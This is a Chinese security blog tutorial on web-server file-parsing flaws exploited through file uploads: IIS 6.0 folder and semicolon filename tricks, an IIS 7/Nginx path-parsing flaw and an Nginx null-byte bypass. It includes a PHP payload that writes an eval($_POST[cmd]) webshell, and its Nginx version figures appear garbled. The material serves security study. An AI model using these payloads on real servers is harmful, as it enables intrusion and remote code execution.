51. 文件上传篇——IIS解析漏洞原理

最新推荐文章于 2025-05-25 22:46:32 发布
最新推荐文章于 2025-05-25 22:46:32 发布
阅读量2.4k 收藏 5
点赞数 2
本文探讨了IIS对特定格式文件夹及文件的错误解析问题,包括如何利用这些漏洞进行攻击。同时介绍了Nginx<8.3版本中存在的畸形解析漏洞及其利用方法,并提及了Nginx<8.03版本中的空字节代码执行漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录解析

当建立“*asp、*asa”格式的文件夹时,其目录下的任意文件都将会被IIS当做ASP文件来解析。

例如:建立文件夹parsing.asp,在parsing.asp文件夹下新建一个文本文件test.txt,其内容为<%=now()%>,然后在浏览器中访问,会发现test.txt会被当做ASP文件执行,在浏览器页面输出当前时间!

文件解析

当文件为“.asp;1.jpg”时,分号后面的不被解析。IIS6.0同样会以ASP脚本方式来执行!

例如:建立文件test.asp;1.jpg,内容为<%=now()%>,将会在浏览器页面输出当前时间。

IIS 7.0/7.5/Nginx<8.3畸形解析漏洞

Nginx解析漏洞是我国安全组织80sec发现的!

在默认Fast-CGI开启的状况下,黑客上传一个名字为wooyun.jpg,内容为

<?php fputs(fopen(‘shell.php’,’w’),’<?php eval($_POST[cmd]?)’);?>

的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马shell.php

Nginx<8.03空字节代码执行漏洞

影响版本:0.5,0.6,0.7<=0.7.65,0.8<=0.8.37

Nginx在图片中嵌入PHP代码然后通过访问 xxx.php%00.jpg 来执行其中的代码

[网络安全自学] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学] 三十五.恶意代码攻击检测及恶意样本分析
热门推荐
杨秀璋的专栏
12-26 1万+
本文主要结合作者的《系统安全前沿》作业,相关论文及绿盟李东宏老师的博客,从产业界和学术界分别详细讲解恶意代码攻击溯源的相关知识。在学术界方面,用类似于综述来介绍攻击追踪溯源的不同方法;在产业界方面,主要参考李东宏老师从企业恶意样本分析的角度介绍溯源工作。关于攻击溯源的博客和论文都比较少,希望这文章对您有所帮助,如果文章中存在错误或理解不到位的地方,还请告知作者与海涵~
文件上传解析漏洞(三)—IIS6.0解析漏洞、CGI解析漏洞、Upload-labs-master20-23Wirteup
weixin_41487522的博客
06-18 1032
文件上传解析漏洞(三)—IIS6.0解析漏洞、CGI解析漏洞、Upload-labs-master20-23Wirteup IIS6.0解析漏洞 IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞但是也有一些的确是漏洞IIS解析漏洞一: IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx都会调用
MySQL安全登录策略
Innocence_0的博客
06-03 2252
进入 MySQL 命令行,通过 show plugins;或者show variables like ‘validate%’;相关参数可以判断是否已安装此插件。若没有相关参数则代表未安装此插件安装前检查 为空则说明未安装此插件。
​​IIS文件上传漏洞绕过:深入解析与高效防御​
最新发布
w2361734601的博客
05-25 992
IIS(Internet Information Services)作为Windows Server的默认Web服务器,其历史版本(如IIS 6.0)因文件解析逻辑缺陷成为攻击者的重点目标。​:IIS 6.0 + ASP黑名单校验 + 内容检测。IIS文件上传漏洞的核心在于​。
文件解析漏洞--IIS--Vulhub
weixin_53736204的博客
07-30 791
用windowserver2003安装IIS测试。
网络安全入门 9 上传漏洞专题--IIS,解析漏洞,文件上传漏洞,上传验证码过滤不严格,开源编辑器的上传漏洞
weixin_41176153的博客
04-22 915
后缀验证:可以通过解析漏洞通过验证 文件内容验证:将一个图片文件改为php格式,然后再里面最后的内容里面填写php代码,然后以php的格式上传,系统会认为这是一个jpg格式的文件,达到成功上传的目的。 开源编辑器的上传漏洞 ...
IIS上传漏洞
p0x1307的专栏
08-27 1415
这个问题深究起来并不算是个漏洞,只能说是配置不当。要成功利用这个问题,需要目标服务器开启以下选项(注意这些都不是默认选项): 开启WebDav服务扩展。开启了这个才会支持PUT和MOVE选项。网站属性“主目录”选项卡中 写入 复选框必须选中。选中“写入”后才能利用PUT上传文件。虽然选中”脚本资源访问“后才能利用MOVE选项将文件后缀名改为asp,但是可以利用IIS 6.0的解析漏洞将文
[网络安全自学] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
0.moonsec-2020-[持续更新]
qwsn
08-02 492
1.HTML基础学习一 常用标签学习——2021.08.02 (0:25:34) 2.HTML基础学习二 form表单与input标签使用——2021.08.02 (0:24:42) 3.HTML基础学习三 a标签、img标签、table表格使用——2021.08.02 (0:15:20) 4.HTML基础学习四 单选框、复选框、下拉选择框、文本域使用——2021.08.02 (00:15:45) 5.HTML基础学习五 列表标签和框架的使用——2021.08.02(0:20:16) ...
IIS_6.0文件解析漏洞及解决办法
04-07
IIS_6.0文件解析漏洞及解决办法IIS_6.0文件解析漏洞及解决办法IIS_6.0文件解析漏洞及解决办法
iis上传漏洞利用工具
07-06
iis解析漏洞利用工具 先扫描ip段 然后把出现漏洞的防放到上传工具里
IIS put上传漏洞
dqd66的博客
10-17 1628
2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞。导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件。IIS Put 上传漏洞前提 :1,IIS开启WebDAV。1.上传(使用PUT方法 上传文本文件 1.txt)3,设置站点目录权限,是的IIS用户不具有写入权限。//chopper是密码。IIS put上传漏洞
IIS-PUT文件上传漏洞
2301_77315080的博客
10-17 1246
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞IIS,此漏洞主要是因为服务器开启了WebDAV的组件导致的可以扫描到当前的操作,具体操作其实是通过WebDAV的OPTIONS来查询是否支持PUT。根据put协议,当我们浏览某个网站,访问某个资源时,如果网站存在这个资源,则会进行替换,若网站不存在这个资源,则会创建这个资源,所以我们可以利用put直接对网站写shell。上的文件夹,该扩展也存在缺陷,可以被恶意攻击者利用,直接上传恶意文件。
上传漏洞iis解析漏洞、asp解析漏洞、文件解析漏洞、畸形解析漏洞、Apache解析漏洞
永不垂头的博客
08-10 1831
上传漏洞iis解析漏洞、asp解析漏洞、文件解析漏洞、畸形解析漏洞、Apache解析漏洞 一、iis解析漏洞 中间件:IIS NGINX APACHE WEBLOGIC JBOSS .NET PHP,JSP PHP,JSP JSP ASP,ASPX IIS解析漏洞 目录解析: www/ 5.x-6.0 /123.asp/ddd.txt/ss.jgp jgp 文件解析.jpg txt格式 jsp xx.asp;.jpg xx.ph
文件上传 IIS 文件解析漏洞
weixin_44769042的博客
06-22 763
iis 6.0 在处理文件解析时会存在两个解析漏洞 1.当文件为 *.asp;.jpg、*.asa;.jpg、*.cer;.jpg、*.cdx;.jpg时,iis6.0 依然会将其以 asp 文件来执行 2.当目录名 为 *.asp、*.asa、*.cer、*.cdx 时,,会将目录下的所有文件作为 asp 文件进行解析 实验环境搭建:win 2003 + iis 6.0 参照大佬,,自己刚开始搭建时一直不得行,配了一个小时都不能访问 0.0 ··· https://blog.csdn.ne..
文件解析漏洞总结(IIS,NGINX,APACHE)
2301_76631050的博客
07-30 1740
这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将 /xx.jpg/xx.php 解析为 php 文件。在IIS7.0和IIS7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。.jpg会被服务器看成是1.asp。
中间件安全IIS----文件解析漏洞利用
ZL_1618的博客
03-20 1883
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。接下来,为服务器开启ASP解析功能,这是所有ASP网站都必须启用的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值